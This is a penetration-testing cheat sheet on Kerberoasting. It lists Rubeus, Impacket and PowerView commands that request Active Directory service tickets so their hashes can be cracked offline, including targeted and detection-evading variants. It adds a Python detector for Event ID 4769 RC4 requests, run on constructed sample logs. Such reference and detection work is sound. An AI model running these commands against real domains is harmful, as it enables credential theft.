# Kerberoasting

### Kerberoasting with Rubeus

```powershell
# Generic Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /nowrap

# Generic Kerberoasting and saving the output to a file
.\Rubeus.exe kerberoast /nowrap /outfile:C:\Windows\Tasks\kerberoast.txt

# Perform targeted Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /user:$serviceaccount

# OpSec-safe Kerberoasting with the 'tgtdeleg' trick, filtering out AES-enabled accounts
.\Rubeus.exe kerberoast /rc4opsec
```

### Kerberoasting with Impacket

```bash
# List accounts with SPNs
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip

# Generic Kerberoasting with Impacket
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip -request

# Targeted Kerberoast (Impacket takes -request-user, not Rubeus-style /user:)
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip -request-user $serviceaccount
```

### Kerberoasting with PowerView

```powershell
# Generic Kerberoast with PowerView
Invoke-Kerberoast | fl

# Specify Domain in Kerberoast
Invoke-Kerberoast -Domain $domain | fl
```
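
### Detecting Kerberoasting in Event ID 4769

Each command above makes a domain controller issue service tickets, which it records as Event ID 4769 when Kerberos service ticket auditing is enabled. The following is an added example, not part of the original page or of any tool named on it: it flags a requester that obtains RC4-HMAC (`0x17`) tickets for several distinct user-backed services within a short window. The JSON-lines export format, the threshold and the window are assumptions, and the events are constructed.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # TicketEncryptionType value for RC4-HMAC
WINDOW = timedelta(minutes=5)  # assumed window, tune per environment
THRESHOLD = 3                  # assumed: distinct services per requester per window

# Constructed sample events (not real logs), one JSON object per line.
SAMPLE = """
{"EventID":4769,"TimeCreated":"2024-05-01T10:00:01","TargetUserName":"jdoe@CORP.LOCAL","ServiceName":"svc_sql","TicketEncryptionType":"0x17","IpAddress":"10.0.0.50"}
{"EventID":4769,"TimeCreated":"2024-05-01T10:00:02","TargetUserName":"jdoe@CORP.LOCAL","ServiceName":"svc_web","TicketEncryptionType":"0x17","IpAddress":"10.0.0.50"}
{"EventID":4769,"TimeCreated":"2024-05-01T10:00:03","TargetUserName":"jdoe@CORP.LOCAL","ServiceName":"svc_backup","TicketEncryptionType":"0x17","IpAddress":"10.0.0.50"}
{"EventID":4769,"TimeCreated":"2024-05-01T10:01:00","TargetUserName":"alice@CORP.LOCAL","ServiceName":"svc_sql","TicketEncryptionType":"0x12","IpAddress":"10.0.0.61"}
{"EventID":4769,"TimeCreated":"2024-05-01T10:02:00","TargetUserName":"bob@CORP.LOCAL","ServiceName":"FILESRV01$","TicketEncryptionType":"0x17","IpAddress":"10.0.0.62"}
{"EventID":4769,"TimeCreated":"2024-05-01T08:00:00","TargetUserName":"carol@CORP.LOCAL","ServiceName":"svc_sql","TicketEncryptionType":"0x17","IpAddress":"10.0.0.63"}
{"EventID":4769,"TimeCreated":"2024-05-01T11:00:00","TargetUserName":"carol@CORP.LOCAL","ServiceName":"svc_web","TicketEncryptionType":"0x17","IpAddress":"10.0.0.63"}
{"EventID":4769,"TimeCreated":"2024-05-01T14:00:00","TargetUserName":"carol@CORP.LOCAL","ServiceName":"svc_backup","TicketEncryptionType":"0x17","IpAddress":"10.0.0.63"}
"""

def is_candidate(ev):
    """RC4 service-ticket request for a user-backed service (not a machine account or krbtgt)."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == 4769
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def detect(lines, window=WINDOW, threshold=THRESHOLD):
    """Map (account, ip) to the services it requested RC4 tickets for inside one window."""
    per_requester = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if is_candidate(ev):
            when = datetime.fromisoformat(ev["TimeCreated"])
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].append((when, ev["ServiceName"]))
    alerts = {}
    for key, reqs in per_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide the window over each request
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                alerts[key] = sorted(services)
                break
    return alerts

if __name__ == "__main__":
    for (account, ip), services in detect(SAMPLE.splitlines()).items():
        print(f"possible Kerberoasting: {account} from {ip} -> {', '.join(services)}")
```

Baseline the threshold and window against legitimate RC4 consumers before alerting on them.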

### References

{% embed url="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting" %}

{% embed url="https://m365internals.com/2021/11/08/kerberoast-with-opsec/" %}
